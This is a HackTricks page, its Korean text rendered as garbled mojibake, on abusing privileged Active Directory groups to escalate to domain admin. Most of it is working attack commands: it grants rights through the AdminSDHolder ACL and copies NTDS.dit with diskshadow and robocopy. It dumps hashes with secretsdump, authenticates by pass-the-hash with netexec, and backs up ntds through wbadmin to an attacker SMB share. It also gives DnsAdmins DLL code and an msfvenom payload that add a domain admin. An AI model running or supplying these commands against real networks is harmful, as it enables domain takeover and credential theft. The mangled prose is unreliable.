ํน๊ถ ๊ทธ๋ฃน
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
๊ด๋ฆฌ ๊ถํ์ด ์๋ ์ ์๋ ค์ง ๊ทธ๋ฃน
- Administrators
- Domain Admins
- Enterprise Admins
Account Operators
์ด ๊ทธ๋ฃน์ ๋๋ฉ์ธ์์ ๊ด๋ฆฌ์๊ฐ ์๋ ๊ณ์ ๊ณผ ๊ทธ๋ฃน์ ์์ฑํ ์ ์๋ ๊ถํ์ ๊ฐ์ง๋๋ค. ๋ํ ๋๋ฉ์ธ ์ปจํธ๋กค๋ฌ(DC)์ ๋ํ ๋ก์ปฌ ๋ก๊ทธ์ธ์ ํ์ฉํฉ๋๋ค.
์ด ๊ทธ๋ฃน์ ๋ฉค๋ฒ๋ฅผ ์๋ณํ๋ ค๋ฉด ๋ค์ ๋ช ๋ น์ ์คํํฉ๋๋ค:
Get-NetGroupMember -Identity "Account Operators" -Recurse
์ ์ฌ์ฉ์๋ฅผ ์ถ๊ฐํ๋ ๊ฒ๊ณผ DC์ ๋ํ ๋ก์ปฌ ๋ก๊ทธ์ธ์ด ํ์ฉ๋ฉ๋๋ค.
AdminSDHolder ๊ทธ๋ฃน
The AdminSDHolder ๊ทธ๋ฃน์ Access Control List (ACL)์ Active Directory ๋ด์ ๋ชจ๋ โprotected groupsโ โ ํนํ high-privilege groups โ ์ ๋ํ ๊ถํ์ ์ค์ ํ๋ฏ๋ก ๋งค์ฐ ์ค์ํฉ๋๋ค. ์ด ๋ฉ์ปค๋์ฆ์ ๋ฌด๋จ ์์ ์ผ๋ก๋ถํฐ ํด๋น ๊ทธ๋ฃน๋ค์ ๋ณดํธํ์ฌ ๋ณด์์ ์ ์งํฉ๋๋ค.
๊ณต๊ฒฉ์๋ AdminSDHolder ๊ทธ๋ฃน์ ACL์ ์์ ํ์ฌ ์ผ๋ฐ ์ฌ์ฉ์์๊ฒ ์ ์ฒด ๊ถํ์ ๋ถ์ฌํ๋ ๋ฐฉ์์ผ๋ก ์ด๋ฅผ ์ ์ฉํ ์ ์์ต๋๋ค. ์ด๋ ๊ฒ ๋๋ฉด ํด๋น ์ฌ์ฉ์๋ ๋ชจ๋ protected groups์ ๋ํด ์ฌ์ค์ ์ ์ฒด ์ ์ด ๊ถํ์ ๊ฐ๊ฒ ๋ฉ๋๋ค. ๋ง์ฝ ์ด ์ฌ์ฉ์์ ๊ถํ์ด ๋ณ๊ฒฝ๋๊ฑฐ๋ ์ ๊ฑฐ๋๋๋ผ๋, ์์คํ ์ค๊ณ์ ์ฝ 1์๊ฐ ๋ด์ ์๋์ผ๋ก ๋ณต์๋ฉ๋๋ค.
๋ฉค๋ฒ๋ฅผ ํ์ธํ๊ณ ๊ถํ์ ์์ ํ๊ธฐ ์ํ ๋ช ๋ น์ด๋ ๋ค์๊ณผ ๊ฐ์ต๋๋ค:
Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
๋ณต๊ตฌ ๊ณผ์ ์ ๊ฐ์ํํ๊ธฐ ์ํ ์คํฌ๋ฆฝํธ๊ฐ ์ ๊ณต๋ฉ๋๋ค: Invoke-ADSDPropagation.ps1.
์์ธํ ๋ด์ฉ์ ired.team์ ์ฐธ์กฐํ์ธ์.
AD Recycle Bin
์ด ๊ทธ๋ฃน์ ๋ํ ๋ฉค๋ฒ์ญ์ ์ญ์ ๋ Active Directory ๊ฐ์ฒด๋ฅผ ์ฝ์ ์ ์๋ ๊ถํ์ ๋ถ์ฌํ๋ฉฐ, ์ด๋ ๋ฏผ๊ฐํ ์ ๋ณด๋ฅผ ๋ ธ์ถ์ํฌ ์ ์์ต๋๋ค:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
Domain Controller Access
DC์ ํ์ผ ์ ๊ทผ์ ์ฌ์ฉ์๊ฐ Server Operators ๊ทธ๋ฃน์ ๊ตฌ์ฑ์์ด ์๋ ๊ฒฝ์ฐ ์ ํ๋๋ฉฐ, ํด๋น ๊ทธ๋ฃน์ ์ํ๋ฉด ์ ๊ทผ ๊ถํ ์์ค์ด ๋ณ๊ฒฝ๋ฉ๋๋ค.
Privilege Escalation
Sysinternals์ PsService๋ sc๋ฅผ ์ฌ์ฉํ๋ฉด ์๋น์ค ๊ถํ์ ๊ฒ์ฌํ๊ณ ์์ ํ ์ ์์ต๋๋ค. ์๋ฅผ ๋ค์ด Server Operators ๊ทธ๋ฃน์ ํน์ ์๋น์ค์ ๋ํด ์ ์ฒด ์ ์ด ๊ถํ์ ๊ฐ์ง๋ฉฐ, ์์ ๋ช
๋ น ์คํ๊ณผ privilege escalation์ ๊ฐ๋ฅํ๊ฒ ํฉ๋๋ค:
C:\> .\PsService.exe security AppReadiness
์ด ๋ช
๋ น์ Server Operators๊ฐ ์ ์ฒด ์ ๊ทผ ๊ถํ์ ๊ฐ์ง๊ณ ์์ด ๊ถํ ์์น์ ์ํด ์๋น์ค๋ฅผ ์กฐ์ํ ์ ์์์ ๋ณด์ฌ์ค๋ค.
Backup Operators
Backup Operators ๊ทธ๋ฃน์ ๊ตฌ์ฑ์์ SeBackup ๋ฐ SeRestore ๊ถํ์ผ๋ก ์ธํด DC01 ํ์ผ ์์คํ
์ ์ ๊ทผํ ์ ์๋ค. ์ด ๊ถํ๋ค์ FILE_FLAG_BACKUP_SEMANTICS ํ๋๊ทธ๋ฅผ ์ฌ์ฉํ์ฌ ๋ช
์์ ๊ถํ์ด ์์ด๋ ํด๋ ํ์, ๋ชฉ๋ก ํ์ธ ๋ฐ ํ์ผ ๋ณต์ฌ ๊ธฐ๋ฅ์ ๊ฐ๋ฅํ๊ฒ ํ๋ค. ์ด ํ๋ก์ธ์ค์๋ ํน์ ์คํฌ๋ฆฝํธ ์ฌ์ฉ์ด ํ์ํ๋ค.
๊ทธ๋ฃน ๋ฉค๋ฒ๋ฅผ ๋์ดํ๋ ค๋ฉด ๋ค์์ ์คํ:
Get-NetGroupMember -Identity "Backup Operators" -Recurse
๋ก์ปฌ ๊ณต๊ฒฉ
์ด๋ฌํ ๊ถํ์ ๋ก์ปฌ์์ ํ์ฉํ๋ ค๋ฉด ๋ค์ ๋จ๊ณ๋ฅผ ์ํํฉ๋๋ค:
- ํ์ํ ๋ผ์ด๋ธ๋ฌ๋ฆฌ ๊ฐ์ ธ์ค๊ธฐ:
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
SeBackupPrivilegeํ์ฑํ ๋ฐ ํ์ธ:
Set-SeBackupPrivilege
Get-SeBackupPrivilege
- ์ ํ๋ ๋๋ ํฐ๋ฆฌ์์ ํ์ผ์ ์ ๊ทผํ๊ณ ๋ณต์ฌํฉ๋๋ค. ์๋ฅผ ๋ค๋ฉด:
dir C:\Users\Administrator\
Copy-FileSeBackupPrivilege C:\Users\Administrator\report.pdf c:\temp\x.pdf -Overwrite
AD Attack
Domain Controller์ ํ์ผ ์์คํ
์ ์ง์ ์ ๊ทผํ๋ฉด ๋๋ฉ์ธ ์ฌ์ฉ์ ๋ฐ ์ปดํจํฐ์ ๋ชจ๋ NTLM ํด์๋ฅผ ํฌํจํ๋ NTDS.dit ๋ฐ์ดํฐ๋ฒ ์ด์ค๋ฅผ ํ์ทจํ ์ ์์ต๋๋ค.
Using diskshadow.exe
C๋๋ผ์ด๋ธ์ ์๋ ๋ณต์ฌ๋ณธ์ ์์ฑํฉ๋๋ค:
diskshadow.exe
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
begin backup
add volume C: alias cdrive
create
expose %cdrive% F:
end backup
exit
- ์๋ ๋ณต์ฌ๋ณธ์์
NTDS.dit๋ณต์ฌ:
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
๋์ ํ์ผ ๋ณต์ฌ์๋ robocopy๋ฅผ ์ฌ์ฉํ์ธ์:
robocopy /B F:\Windows\NTDS .\ntds ntds.dit
- ํด์ ํ๋์ ์ํด
SYSTEM๋ฐSAM์ ์ถ์ถ:
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
NTDS.dit์์ ๋ชจ๋ hashes๋ฅผ ์ถ์ถํ๊ธฐ:
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
- ์ถ์ถ ํ: Pass-the-Hash to DA
# Use the recovered Administrator NT hash to authenticate without the cleartext password
netexec winrm <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> -x "whoami"
# Or execute via SMB using an exec method
netexec smb <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> --exec-method smbexec -x cmd
wbadmin.exe ์ฌ์ฉํ๊ธฐ
- ๊ณต๊ฒฉ์ ๋จธ์ ์์ SMB ์๋ฒ์ฉ NTFS ํ์ผ์์คํ ์ ์ค์ ํ๊ณ ๋์ ๋จธ์ ์์ SMB ์๊ฒฉ์ฆ๋ช ์ ์บ์ํฉ๋๋ค.
- ์์คํ
๋ฐฑ์
๋ฐ
NTDS.dit์ถ์ถ์ ์ํดwbadmin.exe๋ฅผ ์ฌ์ฉํ์ธ์:
net use X: \\<AttackIP>\sharename /user:smbuser password
echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds
wbadmin get versions
echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
For a practical demonstration, see DEMO VIDEO WITH IPPSEC.
DnsAdmins
Members of the DnsAdmins group can exploit their privileges to load an arbitrary DLL with SYSTEM privileges on a DNS server, often hosted on Domain Controllers. This capability allows for significant exploitation potential.
DnsAdmins ๊ทธ๋ฃน์ ๊ตฌ์ฑ์์ ๋์ดํ๋ ค๋ฉด ๋ค์์ ์ฌ์ฉํ์ธ์:
Get-NetGroupMember -Identity "DnsAdmins" -Recurse
์์ DLL ์คํ (CVEโ2021โ40469)
Note
์ด ์ทจ์ฝ์ ์ DNS ์๋น์ค(๋ณดํต DCs ๋ด๋ถ)์์ SYSTEM ๊ถํ์ผ๋ก ์์ ์ฝ๋๋ฅผ ์คํํ ์ ์๊ฒ ํฉ๋๋ค. ์ด ๋ฌธ์ ๋ 2021๋ ์ ์์ ๋์์ต๋๋ค.
๊ตฌ์ฑ์๋ค์ DNS ์๋ฒ๊ฐ ์์์ DLL(๋ก์ปฌ์ด๊ฑฐ๋ remote share์์)์ ๋ก๋ํ๋๋ก ๋ค์๊ณผ ๊ฐ์ ๋ช ๋ น์ ์ฌ์ฉํ์ฌ ๋ง๋ค ์ ์์ต๋๋ค:
dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage:
# If dnscmd is not installed run from aprivileged PowerShell session:
Install-WindowsFeature -Name RSAT-DNS-Server -IncludeManagementTools
// Modify DLL to add user
DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction)
{
system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain");
system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain");
}
// Generate DLL with msfvenom
msfvenom -p windows/x64/exec cmd='net group "domain admins" <username> /add /domain' -f dll -o adduser.dll
DLL์ด ๋ก๋๋๋ ค๋ฉด DNS ์๋น์ค๋ฅผ ์ฌ์์ํด์ผ ํฉ๋๋ค(์ถ๊ฐ ๊ถํ์ด ํ์ํ ์ ์์):
sc.exe \\dc01 stop dns
sc.exe \\dc01 start dns
For more details on this attack vector, refer to ired.team.
Mimilib.dll
mimilib.dll์ ์ฌ์ฉํด ๋ช ๋ น์ ์คํํ๋ ๊ฒ๋ ๊ฐ๋ฅํ๋ฉฐ, ํน์ ๋ช ๋ น์ด๋ reverse shells๋ฅผ ์คํํ๋๋ก ์์ ํ ์ ์์ต๋๋ค. Check this post์์ ์์ธํ ์ ๋ณด๋ฅผ ํ์ธํ์ธ์.
WPAD Record for MitM
DnsAdmins๋ ๊ธ๋ก๋ฒ ์ฟผ๋ฆฌ ์ฐจ๋จ ๋ชฉ๋ก์ ๋นํ์ฑํํ ํ WPAD ๋ ์ฝ๋๋ฅผ ์์ฑํ์ฌ Man-in-the-Middle (MitM) ๊ณต๊ฒฉ์ ์ํํ๊ธฐ ์ํด DNS ๋ ์ฝ๋๋ฅผ ์กฐ์ํ ์ ์์ต๋๋ค. Responder๋ Inveigh ๊ฐ์ ๋๊ตฌ๋ฅผ ์ฌ์ฉํด ์คํธํํ๊ณ ๋คํธ์ํฌ ํธ๋ํฝ์ ์บก์ฒํ ์ ์์ต๋๋ค.
###ย Event Log Readers ๊ตฌ์ฑ์์ ์ด๋ฒคํธ ๋ก๊ทธ์ ์ ๊ทผํ ์ ์์ด plaintext passwords๋ ๋ช ๋ น ์คํ ์ธ๋ถ์ฌํญ๊ณผ ๊ฐ์ ๋ฏผ๊ฐํ ์ ๋ณด๋ฅผ ๋ฐ๊ฒฌํ ์ ์์ต๋๋ค:
# Get members and search logs for sensitive information
Get-NetGroupMember -Identity "Event Log Readers" -Recurse
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}
Exchange Windows ๊ถํ
์ด ๊ทธ๋ฃน์ ๋๋ฉ์ธ ๊ฐ์ฒด์ DACLs๋ฅผ ์์ ํ ์ ์์ด DCSync ๊ถํ์ ์ ์ฌ์ ์ผ๋ก ๋ถ์ฌํ ์ ์์ต๋๋ค. ์ด ๊ทธ๋ฃน์ ์ ์ฉํ ๊ถํ ์์น ๊ธฐ๋ฒ์ Exchange-AD-Privesc GitHub repo์ ์์ธํ ์ค๋ช ๋์ด ์์ต๋๋ค.
# List members
Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse
Hyper-V ๊ด๋ฆฌ์
Hyper-V ๊ด๋ฆฌ์์๊ฒ๋ Hyper-V์ ๋ํ ์ ์ฒด ์ก์ธ์ค ๊ถํ์ด ์์ด ๊ฐ์ํ๋ ๋๋ฉ์ธ ์ปจํธ๋กค๋ฌ๋ฅผ ์ ์ดํ๋ ๋ฐ ์ ์ฉ๋ ์ ์์ต๋๋ค. ์ฌ๊ธฐ์๋ ๋ผ์ด๋ธ DC ๋ณต์ ์ NTDS.dit ํ์ผ์์ NTLM ํด์๋ฅผ ์ถ์ถํ๋ ๊ฒ์ด ํฌํจ๋ฉ๋๋ค.
์ ์ฉ ์์
Firefox์ Mozilla Maintenance Service๋ Hyper-V ๊ด๋ฆฌ์์ ์ํด SYSTEM ๊ถํ์ผ๋ก ๋ช ๋ น์ ์คํํ๊ธฐ ์ํด ์ ์ฉ๋ ์ ์์ต๋๋ค. ์ด๋ ๋ณดํธ๋ SYSTEM ํ์ผ์ ํ๋ ๋งํฌ๋ฅผ ์์ฑํ๊ณ ์ด๋ฅผ ์ ์ฑ ์คํ ํ์ผ๋ก ๊ต์ฒดํ๋ ์์ ์ ํฌํจํฉ๋๋ค:
# Take ownership and start the service
takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
sc.exe start MozillaMaintenance
์ฐธ๊ณ : ์ต๊ทผ Windows ์ ๋ฐ์ดํธ์์ Hard link exploitation์ด ์ํ๋์์ต๋๋ค.
Group Policy Creators Owners
์ด ๊ทธ๋ฃน์ ๊ตฌ์ฑ์์๊ฒ ๋๋ฉ์ธ์์ Group Policies๋ฅผ ์์ฑํ ์ ์๋ ๊ถํ์ ๋ถ์ฌํฉ๋๋ค. ๊ทธ๋ฌ๋ ๊ตฌ์ฑ์์ ์ฌ์ฉ์๋ ๊ทธ๋ฃน์ Group Policies๋ฅผ ์ ์ฉํ๊ฑฐ๋ ๊ธฐ์กด GPOs๋ฅผ ํธ์งํ ์๋ ์์ต๋๋ค.
Organization Management
Microsoft Exchange๊ฐ ๋ฐฐํฌ๋ ํ๊ฒฝ์์๋ Organization Management๋ผ๋ ํน๋ณํ ๊ทธ๋ฃน์ด ์ค์ํ ๊ถํ์ ๊ฐ์ง๋๋ค. ์ด ๊ทธ๋ฃน์ ๋๋ฉ์ธ ๋ด ๋ชจ๋ ์ฌ์ฉ์์ ์ฌ์ํจ์ ์ ๊ทผํ ์ ์๋ ๊ถํ์ ๋ณด์ ํ๋ฉฐ, โMicrosoft Exchange Security Groupsโ Organizational Unit(OU)์ ๋ํ ์์ ํ ์ ์ด๊ถ์ ์ ์งํฉ๋๋ค. ์ด ์ ์ด๊ถ์๋ ๊ถํ ์์น์ ์
์ฉ๋ ์ ์๋ Exchange Windows Permissions ๊ทธ๋ฃน์ด ํฌํจ๋ฉ๋๋ค.
Privilege Exploitation and Commands
Print Operators
Print Operators ๊ทธ๋ฃน์ ๊ตฌ์ฑ์์ ์ฌ๋ฌ ๊ถํ์ ๋ถ์ฌ๋ฐ๋๋ฐ, ๊ทธ์ค์๋ SeLoadDriverPrivilege๊ฐ ์์ด ๋๋ฉ์ธ ์ปจํธ๋กค๋ฌ์ ๋ก์ปฌ๋ก ๋ก๊ทธ์จ(log on locally) ํ๊ณ , ์ด๋ฅผ ์ข
๋ฃ(shut it down)ํ๋ฉฐ ํ๋ฆฐํฐ๋ฅผ ๊ด๋ฆฌํ ์ ์์ต๋๋ค. ์ด๋ฌํ ๊ถํ์ ์
์ฉํ๋ ค๋ฉด, ํนํ ๋น๊ถํ ์์น ์ปจํ
์คํธ์์ SeLoadDriverPrivilege๊ฐ ๋ณด์ด์ง ์๋ ๊ฒฝ์ฐ User Account Control (UAC)์ ์ฐํํด์ผ ํฉ๋๋ค.
์ด ๊ทธ๋ฃน์ ๊ตฌ์ฑ์์ ๋์ดํ๋ ค๋ฉด, ๋ค์ PowerShell ๋ช ๋ น์ ์ฌ์ฉํฉ๋๋ค:
Get-NetGroupMember -Identity "Print Operators" -Recurse
**SeLoadDriverPrivilege**์ ๊ด๋ จ๋ ๋ณด๋ค ์์ธํ ์ต์คํ๋ก์ ๊ธฐ๋ฒ์ ๊ด๋ จ ๋ณด์ ์๋ฃ๋ฅผ ์ฐธ์กฐํ์ญ์์ค.
์๊ฒฉ ๋ฐ์คํฌํฑ ์ฌ์ฉ์
์ด ๊ทธ๋ฃน์ ๊ตฌ์ฑ์์ Remote Desktop Protocol (RDP)์ ํตํด PC์ ์ ๊ทผํ ์ ์๋ ๊ถํ์ ๊ฐ์ง๋๋ค. ํด๋น ๊ตฌ์ฑ์์ ์ด๊ฑฐํ๋ ค๋ฉด PowerShell ๋ช ๋ น์ ์ฌ์ฉํ ์ ์์ต๋๋ค:
Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users"
RDP ์ ์ฉ์ ๋ํ ์ถ๊ฐ ์ ๋ณด๋ ์ ์ฉ pentesting ์๋ฃ์์ ์ฐพ์ ์ ์์ต๋๋ค.
์๊ฒฉ ๊ด๋ฆฌ ์ฌ์ฉ์
๋ฉค๋ฒ๋ **Windows Remote Management (WinRM)**์ ํตํด PC์ ์ ๊ทผํ ์ ์์ต๋๋ค. ์ด๋ฌํ ๋ฉค๋ฒ๋ค์ ์ด๊ฑฐ๋ ๋ค์์ ํตํด ์ํ๋ฉ๋๋ค:
Get-NetGroupMember -Identity "Remote Management Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Users"
WinRM๊ณผ ๊ด๋ จ๋ ์ ์ฉ ๊ธฐ๋ฒ์ ํน์ ๋ฌธ์๋ฅผ ์ฐธ์กฐํด์ผ ํฉ๋๋ค.
Server Operators
์ด ๊ทธ๋ฃน์ ๋๋ฉ์ธ ์ปจํธ๋กค๋ฌ(Domain Controllers)์์ ๋ฐฑ์ ๋ฐ ๋ณต์ ๊ถํ, ์์คํ ์๊ฐ ๋ณ๊ฒฝ, ์์คํ ์ข ๋ฃ ๋ฑ์ ํฌํจํ ๋ค์ํ ๊ตฌ์ฑ์ ์ํํ ๊ถํ์ ๊ฐ์ง๊ณ ์์ต๋๋ค. ๋ฉค๋ฒ๋ฅผ ์ด๊ฑฐํ๋ ค๋ฉด ์ ๊ณต๋ ๋ช ๋ น์ ๋ค์๊ณผ ๊ฐ์ต๋๋ค:
Get-NetGroupMember -Identity "Server Operators" -Recurse
์ฐธ๊ณ ์๋ฃ
- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges
- https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
- https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-bโprivileged-accounts-and-groups-in-active-directory
- https://docs.microsoft.com/en-us/windows/desktop/secauthz/enabling-and-disabling-privileges-in-cโ
- https://adsecurity.org/?p=3658
- http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
- https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
- https://rastamouse.me/2019/01/gpo-abuse-part-1/
- https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/EXE/NtLoadDriver-C%2B%2B/ntloaddriver.cpp#L13
- https://github.com/tandasat/ExploitCapcom
- https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
- https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
- https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e
- https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html
- HTB: Baby โ Anonymous LDAP โ Password Spray โ SeBackupPrivilege โ Domain Admin
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


